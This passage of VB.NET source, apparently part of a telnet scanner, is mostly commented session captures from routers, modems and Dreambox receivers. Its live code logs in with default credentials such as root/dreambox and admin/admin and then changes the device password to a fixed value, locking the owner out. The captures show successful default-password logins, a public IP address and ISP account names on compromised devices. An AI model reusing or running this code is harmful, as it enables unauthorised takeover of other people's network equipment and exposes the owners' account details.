- ' Press 'M' to go to Main Menu
- ' Enter your selection below
- '>>>
- ' CONEXANT SYSTEMS, INC.
- ' ACCESS RUNNER ADSL CONSOLE PORT 3.21
- ' Quit Session
- ' This will quit current telnet session.
- ' Press 'Y' to continue, or 'B' to go back.
- ' Press 'M' for main menu.
- '>>>
- '************************************************************************************
- 'NetDVRDVS:admin
- 'Password:
- 'Login incorrect
- '************************************************************************************
- 'User Access Verification
- 'Username: admin
- 'Password:
- '% Login invalid
- '************************************************************************************
- '(212.217.28.244)
- 'User Access Verification
- 'Password: 1234
- 'GPBM>help
- 'Help may be requested at any point in a command by entering
- 'a question mark '?'. If nothing matches, the help list will
- 'be empty and you must backup until entering a '?' shows the
- 'available options.
- 'Two styles of help are provided:
- '1. Full help is available when you are ready to enter a
- ' command argument (e.g. 'show ?') and describes each possible
- ' argument.
- '2. Partial help is provided when an abbreviated argument is entered
- ' and you want to know what arguments match the input
- ' (e.g. 'show pr?'.)
- 'GPBM>
- 'GPBM>?
- 'Exec commands:
- ' <1-99> Session number to resume
- ' access-enable Create a temporary Access-List entry
- ' access-profile Apply user-profile to interface
- ' clear Reset functions
- ' connect Open a terminal connection
- ' disable Turn off privileged commands
- ' disconnect Disconnect an existing network connection
- ' enable Turn on privileged commands
- ' exit Exit from the EXEC
- ' help Description of the interactive help system
- ' lock Lock the terminal
- ' login Log in as a particular user
- ' logout Exit from the EXEC
- ' name-connection Name an existing network connection
- ' pad Open a X.29 PAD connection
- ' ping Send echo messages
- ' ppp Start IETF Point-to-Point Protocol (PPP)
- ' resume Resume an active network connection
- ' rlogin Open an rlogin connection
- ' set Set system parameter (not config)
- ' show Show running system information
- ' slip Start Serial-line IP (SLIP)
- ' systat Display information about terminal lines
- ' telnet Open a telnet connection
- ' terminal Set terminal line parameters
- ' traceroute Trace route to destination
- ' tunnel Open a tunnel connection
- ' where List active connections
- ' x28 Become an X.28 PAD
- ' x3 Set X.3 parameters on PAD
- 'GPBM>
- 'GPBM>ping 8.8.8.8
- 'Type escape sequence to abort.
- 'Sending 5, 100-byte ICMP Echos to 8.8.8.8, timeout is 2 seconds:
- '!!!!!
- 'Success rate is 100 percent (5/5), round-trip min/avg/max = 44/45/48 ms
- 'GPBM>
- 'GPBM>show ?
- 'backup Backup status
- 'c1700 Show c1700 information
- 'cca CCA information
- 'cdapi CDAPI information
- 'class-map Show QoS Class Map
- 'clock Display the system clock
- 'compress Show compression statistics
- 'dialer Dialer parameters and statistics
- 'exception exception informations
- 'flash: display information about flash: file system
- 'history Display the session command history
- 'hosts IP domain-name, lookup style, nameservers, and host table
- 'isdn ISDN information
- 'location Display the system location
- 'modemcap Show Modem Capabilities database
- 'policy-map Show QoS Policy Map
- 'ppp PPP parameters and statistics
- 'queue Show queue contents
- 'queueing Show queueing configuration
- 'radius Shows radius information
- 'rmon rmon statistics
- 'rtr Response Time Reporter (RTR)
- 'sessions Information about Telnet connections
- 'snmp snmp statistics
- 'tacacs Shows tacacs+ server statistics
- 'template Template information
- 'terminal Display terminal configuration parameters
- 'traffic-shape traffic rate shaping configuration
- 'users Display information about terminal lines
- 'version System hardware and software status
- 'GPBM>show version
- 'Cisco Internetwork Operating System Software
- 'IOS (tm) C1700 Software (C1700-Y-M), Version 12.1(1), RELEASE SOFTWARE (fc1)
- 'Copyright (c) 1986-2000 by cisco Systems, Inc.
- 'Compiled Tue 14-Mar-00 16:40 by cmong
- 'Image text-base: 0x80008088, data-base: 0x805B7EE0
- 'ROM: System Bootstrap, Version 12.0(3)T, RELEASE SOFTWARE (fc1)
- 'GPBM uptime is 5 weeks, 6 days, 45 minutes
- 'System returned to ROM by power-on
- 'System image file is "flash:c1700-y-mz.121-1"
- 'cisco 1720 (MPC860) processor (revision 0x501) with 12288K/4096K bytes of memory
- '.
- 'Processor board ID JAD04180989 (362865562), with hardware revision 0000
- 'M860 processor: part number 0, mask 32
- 'Bridging software.
- 'X.25 software, Version 3.0.0.
- 'Basic Rate ISDN software, Version 1.1.
- '1 FastEthernet/IEEE 802.3 interface(s)
- '1 Serial(sync/async) network interface(s)
- '1 ISDN Basic Rate interface(s)
- '32K bytes of non-volatile configuration memory.
- '4096K bytes of processor board System flash (Read/Write)
- 'Configuration register is 0x2102
- 'GPBM>show diag
- 'Slot 0:
- ' C1720 1FE Mainboard Port adapter, 3 ports
- ' Port adapter is analyzed
- ' Port adapter insertion time unknown
- ' EEPROM contents at hardware discovery:
- ' Hardware Revision : 5.1
- ' PCB Serial Number : JAD04180989
- ' Part Number : 73-3201-05
- ' Board Revision : 70
- ' Fab Version : 04
- ' EEPROM format version 4
- ' EEPROM contents (hex):
- ' 0x00: 04 FF 40 00 B2 41 05 01 C1 8B 4A 41 44 30 34 31
- ' 0x10: 38 30 39 38 39 82 49 0C 81 05 42 37 30 02 04 FF
- ' 0x20: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
- ' 0x30: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
- ' 0x40: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
- ' 0x50: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
- ' 0x60: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
- ' 0x70: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
- ' WIC Slot 0:
- ' Serial 1T WAN daughter card
- ' Hardware revision 1.0 Board revision H0
- ' Serial number 0018074153 Part number 800-01514-01
- ' Test history 0x00 RMA number 00-00-00
- ' Connector type WAN Module
- ' EEPROM format version 1
- ' EEPROM contents (hex):
- ' 0x20: 01 02 01 00 01 13 CA 29 50 05 EA 01 00 00 00 00
- ' 0x30: 88 00 00 00 00 01 29 01 FF FF FF FF FF FF FF FF
- ' WIC Slot 1:
- ' BRI S/T - 2186 WAN daughter card
- ' Hardware revision 1.3 Board revision A0
- ' Serial number 0019915070 Part number 800-01833-03
- ' Test history 0x00 RMA number 00-00-00
- ' Connector type WAN Module
- ' EEPROM format version 1
- ' EEPROM contents (hex):
- ' 0x20: 01 07 01 03 01 2F E1 3E 50 07 29 03 00 00 00 00
- ' 0x30: 50 00 00 00 00 04 25 01 FF FF FF FF FF FF FF FF
- '************************************************************************************
- '-----------------------------------------------------------------------
- 'Cisco Router and Security Device Manager (SDM) is installed on this device.
- 'This feature requires the one-time use of the username "cisco"
- 'with the password "cisco". The default username and password have a privilege le
- 'vel of 15.
- 'Please change these publicly known initial credentials using SDM or the IOS CLI.
- 'Here are the Cisco IOS commands.
- 'username <myuser> privilege 15 secret 0 <mypassword>
- 'no username cisco
- 'Replace <myuser> and <mypassword> with the username and password you want to use
- '.
- 'For more information about SDM please follow the instructions in the QUICK START
- 'GUIDE for your router or go to http://www.cisco.com/go/sdm
- '-----------------------------------------------------------------------
- 'User Access Verification
- 'Username: cisco
- 'Password:
- '% Login invalid
- '************************************************************************************
- 'BCM96338 ADSL Router
- 'Login: bad
- 'Password:
- 'Login incorrect. Try again.
- 'Login: admin
- 'Password: password
- 'Note: If you have problem with Backspace key, please make sure you configure you
- 'r terminal emulator settings. For instance, from HyperTerminal you would need to
- ' use File->Properties->Setting->Back Space key sends.
- ' Main Menu
- '1. ADSL Link State
- '2. LAN
- '3. WAN
- '4. DNS Server
- '5. Route Setup
- '6. NAT
- '7. Firewall
- '8. Quality Of Service
- '9. Management
- '10. Passwords
- '11. Diag
- '12. Reset to Default
- '13. Save and Reboot
- '14. Exit
- ' ->
- '(10)
- 'Note: If you have problem with Backspace key, please make sure you configure you
- 'r terminal emulator settings. For instance, from HyperTerminal you would need to
- ' use File->Properties->Setting->Back Space key sends.
- ' Password Menu
- '1. Admin
- '2. User
- '3. Support
- '4. Exit
- '''Passwords ->
- 'Note: If you have problem with Backspace key, please make sure you configure you
- 'r terminal emulator settings. For instance, from HyperTerminal you would need to
- ' use File->Properties->Setting->Back Space key sends.
- ' Password Menu
- '1. Admin
- '2. User
- '3. Support
- '4. Exit
- '''Passwords -> 1
- ' Password Configuration Menu For User admin
- 'Note: Maximum length of password is 16 characters.
- 'Old password :
- 'New password :
- 'Confirm new password:
- 'Password for admin changed successfully.
- 'Hit <enter> to continue
- 'Note: If you have problem with Backspace key, please make sure you configure you
- 'r terminal emulator settings. For instance, from HyperTerminal you would need to
- ' use File->Properties->Setting->Back Space key sends.
- ' DNS Menu
- '1. Configure
- '2. Show
- '3. Exit
- ''' DNS Server -> 2
- 'Automatic assigned IP address for DNS is enabled.
- 'Primary DNS : 62.251.229.237
- 'Secondary DNS: 62.251.229.223
- 'Hit <enter> to continue
- '14. Exit
- ' -> 14
- 'Bye bye. Have a nice day!!!
- 'Perte de la connexion à l'hôte.
- '************************************************************************************
- 'Password: 1234
- ' Copyright (c) 1994 - 2003 ZyXEL Communications Corp.
- ' Prestige 650R-E1 Main Menu
- ' Prestige 645 Main Menu
- 'Getting Started Advanced Management
- ' 1. General Setup 21. Filter Set Configuration
- ' 3. LAN Setup 22. SNMP Configuration
- ' 4. Internet Access Setup 23. System Password
- ' 24. System Maintenance
- 'Advanced Applications 25. IP Routing Policy Setup
- ' 11. Remote Node Setup 26. Schedule Setup
- ' 12. Static Routing Setup
- ' 15. NAT Setup
- ' 99. Exit
- ' Enter Menu Selection Number:
- '(23)
- '
- ' Menu 23 - System Password
- 'Old Password= ?
- 'New Password= ?
- 'Retype to confirm= ?
- ' Enter here to CONFIRM or ESC to CANCEL:
- '
- ' Menu 4 - Internet Access Setup
- 'ISP's Name= MyISP
- 'Encapsulation= PPPoE
- 'Multiplexing= LLC-based
- 'VPI #= 8
- 'VCI #= 35
- 'ATM QoS Type= UBR
- ' Peak Cell Rate (PCR)= 0
- ' Sustain Cell Rate (SCR)= 0
- ' Maximum Burst Size (MBS)= 0
- 'My Login= saidi_im
- 'My Password= ********
- 'Idle Timeout (sec)= 0
- 'IP Address Assignment= Dynamic
- ' IP Address= N/A
- 'Network Address Translation= SUA Only
- ' Address Mapping Set= N/A
- 'Press ENTER to Confirm or ESC to Cancel:
- '************************************************************************************
- 'Password: 1234
- ' Copyright (c) 1994 - 2004 ZyXEL Communications Corp.
- ' Prestige 660HW-61 Main Menu
- 'Getting Started Advanced Management
- ' 1. General Setup 21. Filter Set Configuration
- ' 2. WAN Backup Setup 22. SNMP Configuration
- ' 3. LAN Setup 23. System Security
- ' 4. Internet Access Setup 24. System Maintenance
- ' 25. IP Routing Policy Setup
- 'Advanced Applications 26. Schedule Setup
- ' 11. Remote Node Setup
- ' 12. Static Routing Setup
- ' 14. Dial-in User Setup 99. Exit
- ' 15. NAT Setup
- ' Enter Menu Selection Number:
- '(23)
- '
- ' Menu 23 - System Security
- '1. Change Password
- '2. RADIUS Server
- '4. IEEE802.1x
- '(1)
- '
- 'Menu 23.1 - System Security - Change Password
- ' Old Password= ?
- ' New Password= ?
- ' Retype to confirm= ?
- ' Enter here to CONFIRM or ESC to CANCEL:
- ' Enter Menu Selection Number:
- '************************************************************************************
- '(Cisco router)
- 'User Access Verification
- 'Username: bad
- 'Password:
- '% Login invalid
- 'Username: admin
- 'Password:
- '% Login invalid
- 'Username: admin
- 'Password:
- '% Login invalid
- 'Perte de la connexion à l'hôte.
- '************************************************************************************
- '**************************
- '* *
- '* The Gemini Project *
- '* *
- '**************************
- 'welcome on your dreambox! - Kernel 2.6.9 (09:30:19).
- 'dreambox login: root
- 'Password:
- 'BusyBox v1.01 (2007.08.23-20:51+0000) Built-in shell (ash)
- 'Enter 'help' for a list of built-in commands.
- 'root@dreambox:~>
- 'root@dreambox:~> help
- '
- 'Built-in commands:
- '-------------------
- ' . : alias bg break cd chdir command continue eval exec exit export
- ' false fg getopts hash help jobs kill let local pwd read readonly
- ' return set shift times trap true type ulimit umask unalias unset
- ' wait
- 'root@dreambox:~> passwd
- 'Changing password for root
- 'Enter the new password (minimum of 5, maximum of 8 characters)
- 'Please use a combination of upper and lower case letters and numbers.
- 'Enter new password:
- 'Re-enter new password:
- 'Password changed.
- 'root@dreambox:~>
- 'root@dreambox:~>
- '\[ fusermount mkdir start-stop-daemon
- 'ash gbox mknod streampes
- 'automount gbox.ver mkswap streamripper
- 'awk gdaemon mmi.socket streamsec
- 'basename gdaemon.socket more streamts
- 'boot grep mount stty
- 'bunzip2 gunzip mv su
- 'busybox gzip nc swapoff
- 'bzcat halt netstat swapon
- 'cat hdparm nslookup sync
- 'chgrp head online.log syslogd
- 'chmod hostname passwd tail
- 'chown hotplug pid.info tar
- 'chroot hotplug.socket pidof telnet
- 'clear httpd ping telnetd
- 'cp id pmt.tmp test
- 'date ifconfig poweroff top
- 'dd in.ftpd prockill touch
- 'df in.telnetd ps true
- 'dmesg inadyn pwd tty
- 'dos2unix inetd rdate udhcpc
- 'dropbear init reboot udpstreampes
- 'dropbearkey insmod reset umount
- 'dropbearmulti kill rm uname
- 'du killall rmdir uniq
- 'dvbnet klogd rmmod unix2dos
- 'echo lcdoff route uptime
- 'enigma lcdstuff sc.info usleep
- 'enigmanet ln sc01.info vi
- 'env loadkmap scp wc
- 'eraseall logger sed wget
- 'etherwake login sh which
- 'expr logread showlogo whoami
- 'false losetup sleep xargs
- 'find ls smbmnt yes
- 'flashtool lsmod smbmount zcat
- 'free md5sum sort
- '************************************************************************************
- '#End Region
- If banner.Contains("dreambox") Then
- 'dreambox login:
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("root" & vbCr), SocketFlags.None)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> BANNERPASSWORD01: " & stringdata, myip)
- 'Password:
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("dreambox" & vbCr), SocketFlags.None)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> Response telnet01: " & stringdata, myip)
- Else
- 'Vulcan
- 'login:
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" & vbCr), SocketFlags.None)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> BANNERPASSWORD: " & stringdata, myip)
- 'password:
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" & vbCr), SocketFlags.None)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> Response telnet01: " & stringdata, myip)
- End If
- ' cisco/cisco
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> Response telnet01a: " & stringdata, myip)
- 'Login Successful
- 'login:
- If stringdata.Contains("ogin:") Then
- Console.WriteLine("{0} -> BAD LOGIN/PASSWORD", myip)
- Else
- '$
- '$passwd
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("passwd" & vbCr), SocketFlags.None)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> Response telnet01b: " & stringdata, myip)
- If banner.Contains("Vulcan") Then
- 'Enter Old Password:
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" & vbCr), SocketFlags.None)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> Response telnet01c: " & stringdata, myip)
- 'On a pas cette ligne sur une BusyBox ou une dreambox
- Else
- End If
- 'Enter New Password:
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" & vbCr), SocketFlags.None)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> Response telnet01d: " & stringdata, myip)
- 'Confirm New Password:
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" & vbCr), SocketFlags.None)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- Console.WriteLine("{0} -> Response telnet01e: " & stringdata, myip)
- recv = Sock_scan.Receive(data)
- stringdata = Encoding.ASCII.GetString(data, 0, recv)
- 'Login incorrect (dreambox)
- 'Password changed
- 'Set Done
- 'SINON: Erreur: Combinaison nom utilisateur/mot de passe invalide
- 'passwd: An error occurred updating the password file. //BusyBox
- Console.WriteLine("{0} -> Response telnet01f: " & stringdata, myip)
- End If
- 'login:
- Sock_scan.Close()
- End If
- If banner.Contains("assword:") Then
- '#Region "BANNERS"
- '********************************************************
- 'Info:Connection was denied by remote host according to ACL!
- '********************************************************
- 'Copyright (c) 2001 - 2006 TP-LINK TECHNOLOGIES CO., LTD
- 'admin
- 'Valid commands are:
- 'sys exit ether wan
- 'ip bridge dot1q pktqos
- 'show set lan
- '********************************************************
- 'Copyright (c) 2001 - 2006 TrendChip Technologies Corp.
- '1234
- 'Valid commands are:
- 'sys exit ether wan
- 'etherdbg usb ip bridge
- 'dot1q pktqos show set
- 'lan
- '
- 'tc> sys countrycode
- 'country code = 253 //Djibouti
- '********************************************************
- ' *******************
- ' Welcome to Vulcan
- ' *******************
- 'Conexant Inc., Software Release 3.C10MTT0.8822A
- 'Copyright (c) 2001-2003 by Conexant, Inc.
- 'login:
- 'admin
- 'password:
- 'admin
- 'Login Successful
- '$
- '$help
- 'Command Description
- '------- -----------
- 'alias To Alias a command
- 'apply Apply configuration/image file
- 'commit Commit the active config to the flash
- 'create Create a new entry of specified type
- 'delete Delete the specified entry
- 'download Download a file on to the Device
- 'exit To exit the CLI shell
- 'get Display info for the search
- 'help Provides help
- 'list List files
- 'modify Modify information for specified entry
- 'passwd To modify user password
- 'ping The normal ping command
- 'prompt Change the user prompt
- 'reboot Reboot the device
- 'remove Remove file
- 'reset Reset info for the specified entry
- 'size ATM Sizing Information
- 'traceroute The normal traceroute command
- 'trigger To set trigger
- 'unalias To undefine previously defined alias
- 'verbose Switch ON/OFF the verbose mode
- '********************************************************
- 'Password: 1234
- 'Copyright (c) 1994 - 2007 ZyXEL Communications Corp.
- 'ras>
- 'ras> help
- 'Valid commands are:
- 'sys exit ether wan
- 'aux wlan ip ipsec
- 'bridge certificates bm lan
- 'vlan radius 8021x autoSec
- 'ras> sys
- 'packetscan adjtime callhist countrycode
- 'date domainname edit extraphnum
- 'feature firewall myZyxelCom hostname
- 'logs stdio datetime time
- 'tos trcdisp trclog trcpacket
- 'version view wdog romreset
- 'upnp atsh atmu ateb
- 'xmodemmode diag save display
- 'adminPassword userPassword default fwnotify
- 'tripleplay general socket filter
- 'ddns cpu winmes snmp
- 'ras> sys adminPassword
- 'Usage: adminPassword <new adminPassword>
- 'ras> sys adminPassword j3R0m3!!
- '
- ' Copyright (c) 1994 - 2003 ZyXEL Communications Corp.
- '
- ' Prestige 650R-E1 Main Menu
- '
- ' Getting Started Advanced Management
- ' 1. General Setup 21. Filter Set Configuration
- ' 3. LAN Setup 22. SNMP Configuration
- ' 4. Internet Access Setup 23. System Password
- ' 24. System Maintenance
- ' Advanced Applications 25. IP Routing Policy Setup
- ' 11. Remote Node Setup 26. Schedule Setup
- ' 12. Static Routing Setup
- ' 15. NAT Setup
- ' 99. Exit
- '
- '
- '
- '
- '
- '
- ' Enter Menu Selection Number:
- '
- '
- ' Menu 1 - General Setup
- '
- ' System Name= ?
- ' Location=
- ' Contact Person's Name=
- ' Domain Name=
- ' Edit Dynamic DNS= No
- '
- ' Route IP= Yes
- ' Bridge= No
- '
- '
- '
- '
- '
- '
- '
- '
- ' Press ENTER to Confirm or ESC to Cancel:
- '
- '
- '
- '
- ' Menu 23 - System Password
- '
- ' Old Password= ?
- ' New Password= ?
- ' Retype to confirm= ?
- '
- '
- '
- '
- '
- '
- '
- '
- '
- '
- '
- '
- '
- ' Enter here to CONFIRM or ESC to CANCEL:
- '
- '
- ' Menu 3 - LAN Setup
- '
- ' 1. LAN Port Filter Setup
- ' 2. TCP/IP and DHCP Setup
- '
- '
- '
- '
- '
- '
- '
- '
- '
- '
- '
- '
- '
- '
- ' Enter Menu Selection Number:
- '
- '
- ' Menu 3.1 - LAN Port Filter Setup
- '
- ' Input Filter Sets:
- ' protocol filters=
- ' device filters=
- ' Output Filter Sets:
- ' protocol filters=
- ' device filters=
- '
- '
- ' Menu 3.2 - TCP/IP and DHCP Setup
- '
- ' DHCP Setup
- ' DHCP= Server
- ' Client IP Pool Starting Address= 192.168.1.33
- ' Size of Client IP Pool= 32
- ' Primary DNS Server= 0.0.0.0
- ' Secondary DNS Server= 0.0.0.0
- ' Remote DHCP Server= N/A
- ' TCP/IP Setup:
- ' IP Address= 192.168.1.1
- ' IP Subnet Mask= 255.255.255.0
- ' RIP Direction= Both
- ' Version= RIP-2B
- ' Multicast= None
- ' IP Policies=
- ' Edit IP Alias= No
- '
- ' Press ENTER to Confirm or ESC to Cancel:
- '
- 'Press Space Bar to Toggle.
- '
- '
- ' Menu 4 - Internet Access Setup
- '
- ' ISP's Name= MyISP
- ' Encapsulation= PPPoE
- ' Multiplexing= LLC-based
- ' VPI #= 8
- ' VCI #= 35
- ' ATM QoS Type= UBR
- ' Peak Cell Rate (PCR)= 0
- ' Sustain Cell Rate (SCR)= 0
- ' Maximum Burst Size (MBS)= 0
- ' My Login= zemzem2
- ' My Password= ********
- ' Idle Timeout (sec)= 0
- ' IP Address Assignment= Dynamic
- ' IP Address= N/A
- ' Network Address Translation= SUA Only
- ' Address Mapping Set= N/A
- '
- ' Press ENTER to Confirm or ESC to Cancel:
- '
- '
- ' Menu 11 - Remote Node Setup
- '
- ' 1. MyISP (ISP, SUA)
- ' 2. ________
- ' 3. ________
- ' 4. ________
- ' 5. ________
- ' 6. ________
- ' 7. ________
- ' 8. ________
- '
- '
- '
- '
- '
- '
- '
- '
- ' Enter Node # to Edit:
- '
- '
- ' Menu 11.1 - Remote Node Profile
- '
- ' Rem Node Name= MyISP Route= IP
- ' Active= Yes Bridge= No
- '
- ' Encapsulation= PPPoE Edit IP/Bridge= No
- ' Multiplexing= LLC-based Edit ATM Options= No
- ' Service Name= zyxel
- ' Incoming: Telco Option:
- ' Rem Login= Allocated Budget(min)= 0
- ' Rem Password= ******** Period(hr)= 0
- ' Outgoing: Schedule Sets=
- ' My Login= zemzem2 Nailed-Up Connection= Yes
- ' My Password= ******** Session Options:
- ' Authen= CHAP/PAP Edit Filter Sets= No
- ' Idle Timeout(sec)= N/A
- ' Edit Traffic Redirect= No
- '
- ' Press ENTER to Confirm or ESC to Cancel:
- '
- '
- ' Menu 21 - Filter Set Configuration
- '
- ' Filter Filter
- ' Set # Comments Set # Comments
- ' ------ ----------------- ------ -----------------
- ' 1 _______________ 7 _______________
- ' 2 _______________ 8 _______________
- ' 3 _______________ 9 _______________
- ' 4 _______________ 10 _______________
- ' 5 _______________ 11 _______________
- ' 6 _______________ 12 _______________
- '
- '
- '
- ' Enter Filter Set Number to Configure= 0
- '
- ' Edit Comments= N/A
- '
- ' Press ENTER to Confirm or ESC to Cancel:
- '
- '
- ' Menu 21.1 - Filter Rules Summary
- '
- ' # A Type Filter Rules M m n
- ' - - ---- --------------------------------------------------------------- - - -
- ' 1 N
- ' 2 N
- ' 3 N
- ' 4 N
- ' 5 N
- ' 6 N
- '
- '
- '
- '
- '
- '
- '
- '
- ' Enter Filter Rule Number (1-6) to Configure:
- '
- '
- '
- ' Menu 21.1.1 - TCP/IP Filter Rule
- '
- ' Filter #: 1,1
- ' Filter Type= TCP/IP Filter Rule
- ' Active= No
- ' IP Protocol= 0 IP Source Route= No
- ' Destination: IP Addr=
- ' IP Mask=
- ' Port #=
- ' Port # Comp= None
- ' Source: IP Addr=
- ' IP Mask=
- ' Port #=
- ' Port # Comp= None
- ' TCP Estab= N/A
- ' More= No Log= None
- ' Action Matched= Check Next Rule
- ' Action Not Matched= Check Next Rule
- '
- ' Press ENTER to Confirm or ESC to Cancel:
- 'ress Space Bar to Toggle.
- '
- '
- ' Menu 22 - SNMP Configuration
- '
- ' SNMP:
- ' Get Community= public
- ' Set Community= public
- ' Trusted Host= 0.0.0.0
- ' Trap:
- ' Community= public
- ' Destination= 0.0.0.0
- '
- '
- '
- '
- '
- '
- '
- '
- '
- ' Press ENTER to Confirm or ESC to Cancel:
- '
- '
- ' Menu 24 - System Maintenance
- '
- ' 1. System Status
- ' 2. System Information and Console Port Speed
- ' 3. Log and Trace
- ' 4. Diagnostic
- ' 5. Backup Configuration
- ' 6. Restore Configuration
- ' 7. Upload Firmware
- ' 8. Command Interpreter Mode
- ' 9. Call Control
- ' 10. Time and Date Setting
- ' 11. Remote Management
- '
- '
- '
- '
- '
- ' Enter Menu Selection Number:
- '
- '
- ' Enter Menu Selection Number: 8
- '
- '
- 'Copyright (c) 1994 - 2003 ZyXEL Communications Corp.
- 'ras> help
- 'Valid commands are:
- 'sys exit ether wan
- 'ip bridge
- 'ras>
- '
- '
- ' Menu 24.11 - Remote Management Control
- '
- ' TELNET Server:
- ' Server Port = 23 Server Access = ALL
- ' Secured Client IP = 0.0.0.0
- '
- ' FTP Server:
- ' Server Port = 21 Server Access = ALL
- ' Secured Client IP = 0.0.0.0
- '
- ' Web Server:
- ' Server Port = 80 Server Access = ALL
- ' Secured Client IP = 0.0.0.0
- '
- '
- '
- '
- '
- ' Press ENTER to Confirm or ESC to Cancel:
- '
- '********************************************************
- '**************************
- '* *
- '* The Gemini Project *
- '* *
- '**************************
- 'welcome on your dreambox! - Kernel 2.6.9 (17:51:55).
- 'dreambox login: admin
- 'Password:
- 'Login incorrect
- 'dreambox login:
- '
- 'root/dreambox
- '********************************************************
- '***************************
- '* *
- '* The Gemini Project *
- '* *
- '***************************
- '* Prepared By "drhg" *
- '* ( Dream-Gaza Team ) *
- '* www.dreamgaza.com *
- '***************************
- 'Checking Kernel, Please Wait ....
- 'Kernel 2.6.9.
- 'md5sum (dreambox Linux ppc ).
- 'head.ko = 308509 bytes.
- 'Safe, NO 'clone bomb' found ... Congratulations.
- 'Enjoy Original Gemini Project without Time Bomb !.
- '---------------------------------------------------
- '(Friday, 17 September 2010).
- 'welcome on your dreambox! - Kernel 2.6.9 (10:46:22).
- 'dreambox login: bad
- 'Password:
- 'Login incorrect
- 'dreambox login: root
- 'Password:
- 'Login incorrect
- 'dreambox login: root
- 'Password:
- 'Login incorrect
- '********************************************************
- 'OpenDreambox 1.5.0 dm800
- 'dm800 login:
- 'dm800 login: bad
- 'Password:
- 'Login incorrect
- 'dm800 login: root
- 'root@dm800:~#
- 'CCcam_2011 head pyhtmlizer
- 'StartNabCam hexdump python
- '\[ hostname rdjpgcom
- 'addgroup hotplug readlink
- 'adduser id reboot
- 'ar ifconfig reboot.sysvinit
- 'arping ifdown renice
- 'ash ifup reset
- 'automount im rjoe
- 'avahi-daemon inadyn rm
- 'awk inadyn_script.sh rmdir
- 'basename inetd rmmod
- 'bdpoll init route
- 'bookify init.sysvinit rquotad
- 'bunzip2 insmod run-parts
- 'busybox ip runlevel
- 'bzcat ipkg rx
- 'cat ipkg-cl scp
- 'cftp ipkg-link sed
- 'chat iwconfig seq
- 'chgrp iwgetid sfdisk
- 'chmod iwlist sh
- 'chown iwpriv sha1sum
- 'chroot iwspy showiframe
- 'chvt jmacs showmount
- 'cjpeg joe shutdown
- 'ckeygen jpegtran shutdown.sysvinit
- 'clear jpico sleep
- 'conch jstar smartctl
- 'cp kill smartd
- 'cpio killall smbd
- 'crond killall5 sort
- 'crontab klogd ssh
- 'cut last start-stop-daemon
- 'czap last.sysvinit statd
- 'date lastb streamproxy
- 'dbclient ldconfig strings
- 'dbus-cleanup-sockets less stty
- 'dbus-daemon lessecho su
- 'dbus-launch lesskey sulogin
- 'dbus-monitor ln swapoff
- 'dbus-send loadfont swapon
- 'dbus-uuidgen loadkmap sync
- 'dc lockd sysctl
- 'dccamd logger syslogd
- 'dd login szap
- 'deallocvt logname t-im
- 'delgroup logread tail
- 'deluser lore tap2deb
- 'depmod losetup tap2rpm
- 'depmod.26 ls tapconvert
- 'df lsmod tar
- 'dirname mailmail tda1002x
- 'djpeg makedevs tee
- 'dmesg manhole telinit
- 'dos2unix map-mbone telnet
- 'dropbear mc telnetd
- 'dropbearconvert mcedit termidx
- 'dropbearkey mcmfmt test
- 'dropbearmulti mcview time
- 'du md5sum tkconch
- 'dumpkmap mesg top
- 'dvbsnoop mesg.sysvinit touch
- 'dvbtraffic mkdir tput
- 'e2fsck mke2fs tr
- 'echo mkfifo traceroute
- 'egrep mkfs.ext2 trial
- 'enigma2 mkfs.ext3 true
- 'enigma2.sh mknod tset
- 'env mkswap tty
- 'ethtool mktap tuxtxt
- 'exportfs mktemp twistd
- 'expr modprobe tzap
- 'false more udhcpc
- 'fbset mount umount
- 'fdisk mountd uname
- 'fdisk.util-linux mountpoint uniq
- 'femon mrinfo unix2dos
- 'fgrep mrouted unzip
- 'find mv update-alternatives
- 'free nc update-inetd
- 'fsck.ext2 netstat update-modules
- 'fsck.ext3 nfs_server_script.sh update-passwd
- 'ftpget nfsd update-rc.d
- 'ftpput nfsstat uptime
- 'getepgchannels nhfsgraph utmpdump
- 'getkey nhfsnums uudecode
- 'getty nhfsrun uuencode
- 'grab nhfsstone vi
- 'grep nmbd vlock
- 'gst-feedback nslookup vsftpd
- 'gst-feedback-0.10 od wall
- 'gst-inspect openvpn wall.sysvinit
- 'gst-inspect-0.10 openvpn_script.sh watch
- 'gst-launch openvt wc
- 'gst-launch-0.10 passwd wdog
- 'gst-typefind patch wget
- 'gst-typefind-0.10 pidof which
- 'gst-visualise-0.10 pidof.sysvinit who
- 'gst-xmlinspect ping whoami
- 'gst-xmlinspect-0.10 pivot_root wpa_cli
- 'gst-xmllaunch poff wpa_passphrase
- 'gst-xmllaunch-0.10 pon wpa_supplicant
